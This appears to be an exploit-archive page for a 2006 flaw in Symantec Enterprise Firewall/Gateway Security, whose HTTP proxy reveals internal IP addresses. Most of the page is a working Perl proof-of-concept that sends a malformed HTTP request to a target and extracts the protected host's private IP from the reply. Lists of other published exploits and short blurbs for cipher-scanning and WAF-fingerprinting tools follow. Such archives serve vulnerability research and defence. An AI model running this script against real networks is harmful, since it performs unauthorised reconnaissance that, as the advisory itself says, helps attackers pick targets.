Menu

Search for hundreds of thousands of exploits

"Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage"

Author

Exploit author

"Bernhard Mueller"

Platform

Exploit platform

multiple

Release date

Exploit published date

2006-05-10

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
source: https://www.securityfocus.com/bid/17936/info

Symantec Enterprise Firewall and Gateway Security products are prone to an information-disclosure weakness. 

The vendor has reported that the NAT/HTTP proxy component of the products may reveal the internal IP addresses of protected computers. 

An attacker may use this information to carry out targeted attacks against a potentially vulnerable host.

#!/usr/bin/perl
# [title] raptor firewall internal IP disclosure 'exploit'
# [mailto] research [at] sec-consult [dot} com
#
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
# waiting for timeout (this can take about 1 min.)
# behind.raptor.com: 10.238.94.67

use IO::Socket;

$| = 1;

$host = $ARGV[0] or die "$0 <host>\n";

$request = "getXXX/XXX HTTP/1.0\n\n";

my $sock = new IO::Socket::INET (
                 PeerAddr => $host,
                 PeerPort => 80,
                 Proto => 'tcp',
);

die "could not open socket: $!\n" unless $sock;

print $sock $request;

print "waiting for timeout (this can take about 1 min.)\n";

while (<$sock>) {
                 if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
                                 $ip = $1;
                 }
}

if (defined($ip)) {
                 print "$host: $ip\n";
} else {
                 print "failed.\n";
}

close($sock);
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2015-08-18 "Cisco Unified Communications Manager - Multiple Vulnerabilities" webapps multiple "Bernhard Mueller"
2014-12-23 "SysAid Server - Arbitrary File Disclosure" webapps windows "Bernhard Mueller"
2012-10-17 "ModSecurity - 'POST' Security Bypass" remote linux "Bernhard Mueller"
2009-03-10 "IBM System Director Agent 5.20 - CIM Server Privilege Escalation" local windows "Bernhard Mueller"
2009-03-10 "IBM Director 5.20.3su2 CIM Server - Remote Denial of Service" dos windows "Bernhard Mueller"
2007-10-31 "Perdition 1.17 - IMAPD __STR_VWRITE Remote Format String" dos linux "Bernhard Mueller"
2006-05-10 "Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage" remote multiple "Bernhard Mueller"
2005-11-07 "ToendaCMS 0.6.1 - 'admin.php' Directory Traversal" webapps php "Bernhard Mueller"
2005-10-26 "RSA ACE Agent 5.x - Image Cross-Site Scripting" webapps cgi "Bernhard Mueller" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected